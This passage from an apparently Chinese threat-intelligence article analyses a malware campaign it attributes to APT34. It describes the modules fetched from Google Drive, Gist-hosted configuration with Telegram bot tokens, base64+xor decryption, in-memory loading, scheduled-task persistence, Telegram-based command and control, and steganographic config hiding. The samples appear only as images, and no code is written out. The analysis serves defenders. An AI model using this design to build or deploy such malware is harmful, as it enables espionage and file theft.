src="https://wechat2rss.xlab.app/img-proxy/?k=88d209e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIaUBfZvuicPBcfUsn6FfXibUdnKwtRTcp2qAIxPL8srKWicy1ctgyB9xovic4yhV885NQo0tsE0gYBSQ8FQsm7PhXdqpbJLbC0rqA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">对该配置解密得到Google Drive链接，这些链接分别指向pr（持久化模块），up（上传模块），do（下载模块）,cm（命令执行模块）和runApp（程序执行模块）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。</span></p><p style="text-align: center;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.39365079365079364" data-w="1260" style="width: 553.74px;height: 218px;" src="https://wechat2rss.xlab.app/img-proxy/?k=02d23e97&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJvtzg6F3RiaaexOGlF5R4juLxNsibJDuLtHkavP21KXAb7MNbGicYFibtFNEgokxgFLVHsibib1zJR8b4z0ZqxWBK2pr5qhmfmZqaJg%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">接着通过GitHub API获取指定Gist中的配置文件（etagtest.txt），然后解析内容并抢占标记为&#34;FREE&#34;的配置项（将其状态更新为&#34;USED&#34;），最后将包含</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Telegram Bot Token和Chat ID</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的配置信息写入本地缓存（CONF.dat）以便后期使用，并同步更新Gist的配置文件etagtest.txt中。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0365659777424483" data-w="629" style="width: 232.04px;height: 240.53px;" src="https://wechat2rss.xlab.app/img-proxy/?k=dbce00c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJasJjSE1w21sy0CEXNWjXm9mD8PoHvvknlGp7tCxfib6RaSBH64ut4JBktWVjQxczCNm9x4Wyxcs2C94pRDacXwZIOCzbOj9c0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5124626121635095" data-w="1003" style="width:412.21002197265625px;height:211.26998901367188px;" src="https://wechat2rss.xlab.app/img-proxy/?k=1e39bb13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXL6slT0fzYwRr27EyZOVJFzbZHrdmL2uqseOZ0ibhx45UCooa7jAbOImceYYSH1Llugx2HiaMVqXE7qNNLzJXQSRic2SvUGRv25o0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">然后使用内存加载的方式执行</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">各个</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">模块，从上述得到的谷歌云盘URL获取解密数据，解密方式依然采用base64+xor的方式如下所示：</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6924476797088263" data-w="1099" style="width: 353.98px;height: 245.13px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7abab53d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJiadkXE8oC8xetcvjIlYjRGK7kCrhBukUjutN2j6LDPVOMMmD7M9Ul1jnll6Qjxu30z1XyKcZUib3Q92ZI8cXiasEE5owP3JWvSs%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">首先加载的是pr模块，目的是实现持久化。传入的参数是moduleName和当前路径appPath。根据moduleName参数选择需要下载的C#的源码，然后进行编译，最后通过内存加载的方式执行pr模块。</span></span><o:page></o:page></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6745964316057774" data-w="1177" style="width:306.65997314453125px;height:206.86001586914062px;" src="https://wechat2rss.xlab.app/img-proxy/?k=dbded6d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJicmq6yAx8BhWNouYf72ibC27X5PQSs35jYAYsiaYAaY319pv8gzmDrCDUAiaEhRvMoGwfvnXWktgk5iaGh9GzZ7zxOywKSxzxPHJY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">pr模块实际上是一个实现计划任务的功能，持久化路径是传入的参数，也就是当前进程路径。</span></span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5852311939268461" data-w="1449" style="width:389.47003173828125px;height:227.92999267578125px;" src="https://wechat2rss.xlab.app/img-proxy/?k=130b5c05&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJCa3gWCXUde8mDN8b3lRryia265OQFveyomW2WAATD30TThEMmv0iceC1ib4kURGnGHn666hNcRsW7SeejSiblicfhhaAZN9C8aeFE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">然后通过telegram API发送&#34;is online&#34;消息，实现心跳上线。</span></span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.189873417721519" data-w="1185" style="width:553.739990234375px;height:105.1300048828125px;" src="https://wechat2rss.xlab.app/img-proxy/?k=5a255ba8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLK7pFALNToTJeWGSYeI05ic1nJCI41fZbpuIQ4icKicIgFZw67Wogugu2eFvyJGptG7JNm0icW4iaicXjtMoicd4Jm1tC48YcbeUqd5E%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">然后通过Telegram Bot API实现C2通讯交互从而实现远程控制，目前支持的功能有dllexec，upload，download，cmd，runapp。</span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">dllexec的功能是dll模块内存加载，可以通过编译CS源码执行Dll，也可以通过指定的Dll路径执行文件。</span></span><o:page></o:page></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5747826086956521" data-w="1150" style="width:387.1899719238281px;height:222.53997802734375px;" src="https://wechat2rss.xlab.app/img-proxy/?k=88266175&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKHfVTJTakN7jL5XCibOdibo0DGZEIZU9KLW6niajpUdtuLFomfkHkcCNTiaBehIqXb4CRu1dNiblzTF9KOOXKiaCwD8yDAZCQibRgWIM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">up功能为文件上传，它是通过内存执行up模块实现的。up模块内容如下：</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6838046272493573" data-w="1167" style="width: 367.63px;height: 251.4px;" src="https://wechat2rss.xlab.app/img-proxy/?k=559afae8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJNmqfgt7Giaz6ibmIduiacPumcdgfbED9C4gIHKyUnPgqKqO4xibmY2qicLmqJnk1nlFeI9FWdbwMA5rHmK9uNA5k5r3WUYPNy6LUM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">download功能是文件窃取，它是通过执行do模块实现的，do模块内容如下：</span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6032461677186655" data-w="1109" style="width:380.1700134277344px;height:229.30999755859375px;" src="https://wechat2rss.xlab.app/img-proxy/?k=076acffa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJcROsslum3cwoYOpmibaFcNLs7ULIl3qNmrMk0q8jrJVzYSKKHQhmEiaOOHNZ4nx4nqia4px0EQ7DvmjGPa7NE8FL3BNhO3xyG64%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span><o:page></o:page></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">需要说明的是，do模块中存在大量波斯语的注释。</span></p><p style="text-align:center;"><span style="text-indent: 21pt;font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf="" style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.45298013245033114" data-w="755" style="width:397.65997314453125px;height:180.11001586914062px;" src="https://wechat2rss.xlab.app/img-proxy/?k=57d40d52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIKEfBFFVLgvibKXhhzZXzaq7icjnMHqrUI5C0fibzsbzGRiblo7aPQDQXWsuRyqwoBK5ic8cAribiaMb4u7to1H05M7Y0LibU2npQz87A%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-align: left;text-indent: 2em;"><span leaf="" style="text-indent: 2em;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Cmd的功能是命令执行，它是通过执行cm模块实现的，cm模块的内容如下</span><span leaf="" style="font-family: 等线;font-variant: normal;text-transform: none;"><span textstyle="" style="font-size: 17px;">：</span></span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.42935206869633097" data-w="1281" style="width:421.3099670410156px;height:180.87997436523438px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c40cc4db&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIWf6U0A0ktbvtc5AOic9GIBBxt5N4XSyPc97VSOqvRvl6bnvfQyL5cgFcGzwa14ZSsmjNrHFXvdSdnTpDDkuj4SraBMiat4kzD0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Runapp的功能是执行程序，它是通过加载RunApp模块实现的，RunApp的内容如下：</span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4003777148253069" data-w="1059" style="width:432.23004150390625px;height:173.02996826171875px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e5326d14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLYSB2KtytR3PJNhReCx4oWhhTZ23debnX3Q65m0VGVH0MHN4y7PlONzEI4DWvHE5TINic80qZxiajX9p1wXU6YDY3LQBpYlVwKc%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">值得一提的是我们发现该github用户johnpeterson1304的名下，还存在多个命名规则相似、仅包含单一txt文件的独立仓库，其文件内容均为 Base64编码字符串，用于外部资源（Google Drive）下载链接的托管与分发，这些链接都是指向图片,对这些图片使用LSB算法提取配置信息并解密后得到的信息相同，后续和上述分析一致。</span><o:page></o:page></p><p style="text-align:center;"><span style="text-indent: 21pt;font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf="" style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7518248175182481" data-w="959" style="width:436.77996826171875px;height:328.3500061035156px;" src="https://wechat2rss.xlab.app/img-proxy/?k=05de44ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKtYsn2VfUNspibM2OvD9Arlt1icBE3ASAfaVK7Sdia8sCHpJT4AqTTB8xhQU4DDwXOibojhZwNAACfK0mMqaiafMg6qBPShI5c2CSY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">此外在该仓库下我们还发现本次攻击行动的测试样本，相较测试样本，现在版本在隐蔽性和功能扩展性上有了显著提升，增加了对动态编译源码的支持，还增加了直接内存加载 DLL的方式。这样的目的使得攻击载荷的下发更加多样化且难以追踪。</span></p><p style="text-align:center;"><span style="text-indent: 28.65pt;word-break: break-all;font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf="" style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3246268656716418" data-w="1340" style="width:489.55999755859375px;height:158.89996337890625px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e3fcbe34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKshtwpyuotKMicnSUsfDcIaBmOicbaOez2Uib0dvlZk7LDWHso8rRyyRhvOJlmPgdzpDIp34ic1ANRhUrFGYCpqVR56BRLHfMo48E%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">三、归属研判</span></span></strong></p></div></div></div></div></div><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">通过对本次攻击事件的详细分析，综合初始载荷的执行入口设计、关键技战术要素及完整攻击链条特征判断，该样本在整体作战思路与工程实现层面与APT34历史活动高度一致，具体表现如下：</span><o:page></o:page></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">1. </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">初始载荷和APT34以往样本的技战术保持极高一致性</span><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[1]</span></sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，都以Excel的工作簿事件作为主要入口点，并且都涉及sheet操作（以往样本是可见性切换来实现反沙箱/诱导启用宏，本次样本升级为针对特定字符的内容损坏/恢复机制，可能用于迷惑用户以便动态编译payload）。此外，更重要的是攻击链条高度统一：VBA宏+Base64解码（从UserForm或CustomXMLParts提取）+写入.exe+同名.config配置文件+XML定义的定时任务（schtasks或Schedule.Service）+.NET载荷执行。该链条在组件拆分方式、数据承载位置选择以及持久化实现路径上均与APT34历史样本保持一致，呈现出明显的家族化与工程化特征。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2. </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该组织近年来不断通过滥用合法云平台来掩盖其恶意流量，本次使用谷歌云盘下发数据和使用Telegram</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">作为C2通信也与该组织以往技战术符合。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3. </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">无论是前期测试代码还是本次实际的攻击代码均存在波斯语的注释，说明攻击者以波斯语为母语，符合攻击者身份。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span 